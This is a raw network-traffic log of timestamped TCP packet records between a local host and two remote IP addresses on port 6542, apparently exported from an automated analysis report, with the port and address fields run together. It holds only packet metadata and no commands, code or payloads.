                                                                  Dec 2, 2024 18:43:22.554301977 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.554404974 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.554883957 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.554945946 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.555520058 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.555579901 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.555660009 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.555743933 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.559288025 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.559350967 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.559436083 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.559497118 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.563201904 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.563257933 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.563359022 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.563422918 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.567177057 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.567230940 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.567770004 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.567826033 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.571060896 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.571109056 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.571285963 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.571330070 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.574943066 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.574992895 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.575086117 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.575158119 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.580163956 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.580171108 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.580220938 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.582942009 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.582950115 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.583005905 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.586889982 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.586981058 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.587310076 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.587368011 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.590744019 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.590791941 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.591001987 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.591075897 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.594680071 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.594733953 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.594808102 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.594882011 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.598563910 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.598613024 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.598687887 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.598735094 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.602397919 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.602452993 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.602535009 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.602602959 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.605407000 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.605454922 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.605567932 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.605623960 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.609630108 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.609688044 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.609818935 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.609863997 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.612991095 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.612998962 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.613128901 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.615219116 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.615299940 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.615310907 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.615367889 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.617597103 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.617640018 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.617701054 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.620161057 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.620227098 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.620310068 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.620374918 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.623266935 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.623380899 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.623440981 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.623509884 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.626353979 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.626420975 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.626579046 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.626631021 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.628779888 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.628865957 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.628875017 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.628930092 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.631680965 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.631745100 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.631987095 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.632044077 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.634191990 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.634238005 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.634296894 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.634335995 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.637016058 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.637084007 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.637154102 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.637212038 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.639631987 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.639717102 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.639730930 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.639755964 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.642510891 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.642565966 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.642829895 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.642893076 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.645735979 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.645802975 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.645864964 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.645917892 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.648233891 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.648320913 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.648396015 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.648444891 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.651026011 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.651087046 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.651186943 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.651262045 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.653892040 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.654047012 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.654109955 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.654125929 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.656843901 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.656913042 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.657092094 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.657151937 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.659652948 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.659693956 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.659751892 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.659816027 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.662597895 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.662666082 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.662724972 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.662782907 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.665453911 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.665494919 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.665509939 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.665540934 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:22.668251038 CET65424971394.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:22.668323994 CET497136542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:24.854973078 CET654249704103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:24.855649948 CET497046542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:24.869864941 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:24.871653080 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:24.926542044 CET497066542192.168.2.5103.57.249.207
                                                                  Dec 2, 2024 18:43:25.046802998 CET654249706103.57.249.207192.168.2.5
                                                                  Dec 2, 2024 18:43:25.321806908 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:25.446635962 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:25.447649002 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:25.448070049 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:25.574285030 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:26.693116903 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:26.693197012 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:26.693203926 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:26.693218946 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:26.693248987 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:26.693263054 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:26.698985100 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:26.820955038 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:27.092343092 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:27.092396975 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:27.093478918 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:27.213773012 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.277200937 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.277311087 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.277345896 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.277360916 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.277399063 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.277966976 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.278027058 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.278098106 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.278110027 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.278151035 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.286204100 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.286259890 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.286355019 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.286403894 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.295207977 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.295258045 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.295347929 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.295392036 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.302875042 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.302927017 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.303024054 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.303071022 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.342175007 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.342262030 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.342375040 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.342432022 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.397409916 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.397481918 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.456157923 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.456207991 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.456301928 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.456345081 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.460396051 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.460530996 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.460556984 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.460581064 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.468938112 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.468996048 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.469063997 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.469110966 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.477492094 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.477539062 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.477679014 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.477720976 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.486154079 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.486218929 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.486237049 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.486412048 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.494609118 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.494669914 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.494736910 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.494791031 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.503365993 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.503424883 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.503446102 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.503488064 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.511884928 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.511955976 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.512054920 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.512098074 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.520827055 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.520884991 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.520895004 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.520939112 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.530462980 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.530656099 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.530678988 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.530814886 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.539072990 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.539129972 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.539244890 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.539294004 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.544244051 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.544295073 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.544327021 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.544374943 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.548434973 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.548485041 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.548588037 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.548633099 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.554528952 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.554600954 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.554635048 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.554651976 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.560508966 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.560565948 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.648113966 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.648205042 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.648278952 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.648278952 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.649843931 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.649893999 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.650006056 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.650054932 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.656423092 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.656472921 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.656511068 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.656709909 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.662278891 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.662360907 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.662400007 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.662442923 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.667984962 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.668034077 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.668107986 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.668154955 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.674165010 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.674221039 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.674253941 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.674323082 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.678555012 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.678606033 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.678649902 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.678837061 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.683053017 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.683109045 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.683142900 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.683188915 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.687887907 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.687932014 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.688028097 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.688074112 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.692047119 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.692101002 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.692245960 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.692296982 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.697264910 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.697315931 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.697441101 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.697490931 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.701183081 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.701234102 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.701309919 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.701358080 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.705996037 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.706049919 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.706077099 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.706118107 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.711040974 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.711090088 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.711179972 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.711229086 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.714818001 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.714869022 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.714903116 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.714952946 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.718730927 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.718802929 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.718826056 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.718872070 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.723165035 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.723210096 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.723362923 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.723408937 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.727636099 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.727698088 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.727715969 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.727775097 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.731668949 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.731829882 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.731852055 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.731899977 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.735976934 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.736032963 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.768369913 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.768445015 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.768543005 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.768543005 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.770534992 CET65424974094.232.43.224192.168.2.5
                                                                  Dec 2, 2024 18:43:32.770586967 CET497406542192.168.2.594.232.43.224
                                                                  Dec 2, 2024 18:43:32.770711899 CET65424974094.232.43.224192.168.2.5
